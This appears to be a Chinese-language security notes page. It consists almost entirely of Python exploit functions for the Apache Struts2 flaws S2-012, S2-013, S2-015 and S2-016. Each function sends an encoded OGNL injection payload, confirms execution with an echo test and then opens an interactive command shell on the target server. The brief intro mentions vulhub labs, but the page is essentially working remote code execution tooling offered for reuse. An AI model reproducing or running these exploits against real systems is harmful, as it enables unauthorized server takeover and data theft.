Struts 系列漏洞不再逐一复现，插入 payload 并更换想要执行的命令即可；相关 payload 可在 vulhub 各漏洞目录的 readme.md 文档中获取。由于各个漏洞的利用逻辑都一样，利用脚本直接使用 GitHub 上的 struts.py 即可。
s2-012


```python
def s2012(url):
    try:
        proxy = '192.168.43.74:8080'  # 本地代理
        proxies = {
            'http': 'http://' + proxy,
            'https': 'https://' + proxy
        }
        url1 = "user.action"
        cmd = 'echo 367568'
        m = re.sub(' ', '","', str(cmd))
        n = '"' + m + '"'
        p = urllib.parse.quote(n)
        a = "%25%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B" + p + "%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D"
        b = urllib.parse.unquote(a)
        data = {'name': b}
        res = requests.post(url + url1, data=data)
        if b'367568' in res.content:
            print("----------存在S2-012----------")

            while 1:
                cmd = input("shell>")
                if "exit" in cmd:
                    print("结束s2-012利用")
                    break
                m = re.sub(' ', '","', str(cmd))
                p = urllib.parse.quote(m)
                a = "%25%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%22" + p + "%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D"
                b = urllib.parse.unquote(a)
                data = {'name': b}

                # print(res.content)
                try:
                    res = requests.post(url + url1, data=data, proxies=proxies)
                    c = re.findall(r"b'(.*?)\\n\\x00", str(res.content))
                    e = re.sub(r'\\n', '\n', c[0])
                    print(e)
                except:
                    print("程序执行成功")
                    continue

                # print(c)


        else:
            print("不存在S2-012")
    except:
        print("程序出现未知错误")

```

s2-013


```python
def s2013(url):
    try:
        url1 = "link.action"
        a = "?a=%24{233%2a233}"
        res = requests.get(url + url1 + a)
        if b'54289' in res.content:
            print('-----------存在s2-013-----------')

            while 1:
                cmd = input("shell>")
                if "exit" in cmd:
                    print("结束s2-013利用")
                    break
                a = "?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('" + cmd + "').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D"
                try:
                    res = requests.get(url + url1 + a, timeout=2)
                    a = re.findall(r"b'dbapp=(.*?)\\n\\x00", str(res.content))
                    c = re.sub(r'\\n', '\n', a[0])
                    print(c)
                except:
                    print("程序执行成功")
                    continue
        else:
            print('不存在s2-013')
    except:
        print("程序出现未知错误")

```

s2-015

```python

def s2015(url):
    try:
        cmd = 'echo 367568'
        m = "%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27" + cmd + "%27%29.getInputStream%28%29%29%2C%23q%7D.action"
        n = "param.action?message=%25%7b%23%63%6f%6e%74%65%78%74%5b%27%78%77%6f%72%6b%2e%4d%65%74%68%6f%64%41%63%63%65%73%73%6f%72%2e%64%65%6e%79%4d%65%74%68%6f%64%45%78%65%63%75%74%69%6f%6e%27%5d%3d%66%61%6c%73%65%2c%23%6d%3d%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2e%67%65%74%43%6c%61%73%73%28%29%2e%67%65%74%44%65%63%6c%61%72%65%64%46%69%65%6c%64%28%27%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%27%29%2c%23%6d%2e%73%65%74%41%63%63%65%73%73%69%62%6c%65%28%74%72%75%65%29%2c%23%6d%2e%73%65%74%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2c%74%72%75%65%29%2c%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27" + cmd + "%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%2c%23%71%7d"
        res1 = requests.get(url + m, timeout=2)
        res2 = requests.get(url + n, timeout=2)
        # print(res1.text)
        if b'367568' in res1.content and b'echo' not in res1.content:
            print('-----------存在s2-015-----------')

            while 1:
                cmd = input("shell>")
                if "exit" in cmd:
                    print("结束s2-015利用")
                    break
                a = "%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27" + cmd + "%27%29.getInputStream%28%29%29%2C%23q%7D.action"
                res = requests.get(url + a, timeout=2)
                # print(res.text)
                b = re.findall(r"</b> /(.*?)%0A.jsp", str(res.content))
                c = urllib.parse.unquote(b[0])
                print(c)
        elif 'fxxk' in res2.headers:
            if '367568' in res2.headers['fxxk']:
                print('-----------存在s2-015-----------')

                while 1:
                    cmd = input("shell>")
                    if "exit" in cmd:
                        print("结束s2-015利用")
                        break
                    a = "param.action?message=%25%7b%23%63%6f%6e%74%65%78%74%5b%27%78%77%6f%72%6b%2e%4d%65%74%68%6f%64%41%63%63%65%73%73%6f%72%2e%64%65%6e%79%4d%65%74%68%6f%64%45%78%65%63%75%74%69%6f%6e%27%5d%3d%66%61%6c%73%65%2c%23%6d%3d%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2e%67%65%74%43%6c%61%73%73%28%29%2e%67%65%74%44%65%63%6c%61%72%65%64%46%69%65%6c%64%28%27%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%27%29%2c%23%6d%2e%73%65%74%41%63%63%65%73%73%69%62%6c%65%28%74%72%75%65%29%2c%23%6d%2e%73%65%74%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2c%74%72%75%65%29%2c%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27" + cmd + "%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%2c%23%71%7d"
                    res = requests.get(url + a, timeout=2)
                    print(res.headers['fxxk'])
            else:
                print('不存在s2-015')
        else:
            print('不存在s2-015')
    except:
        print("不存在S2-015")

```

s2-016

```python

def s2016(url):
    try:
        cmd = 'echo 367568'
        a = "index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%2C%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" + cmd + "%22%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read%28%23d%29%2C%23genxor%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2C%23genxor.println%28%23d%29%2C%23genxor.flush%28%29%2C%23genxor.close%28%29%7D%0A"
        res = requests.get(url + a, timeout=2)
        if b'367568' in res.content and b'echo' not in res.content:
            print('-----------存在s2-016-----------')

            while 1:
                cmd = input("shell>")
                if "exit" in cmd:
                    print("结束s2-016利用")
                    break
                a = "index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%2C%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" + cmd + "%22%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read%28%23d%29%2C%23genxor%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2C%23genxor.println%28%23d%29%2C%23genxor.flush%28%29%2C%23genxor.close%28%29%7D%0A"
                res = requests.get(url + a, timeout=2)
                # print(res.content)
                a = re.findall(r"b'(.*?)\\n\\x00", str(res.content))
                b = re.sub(r'\\n', '\n', a[0])
                print(b)
        else:
            print('不存在s2-016')
    except:
        print("不存在S2-016")
```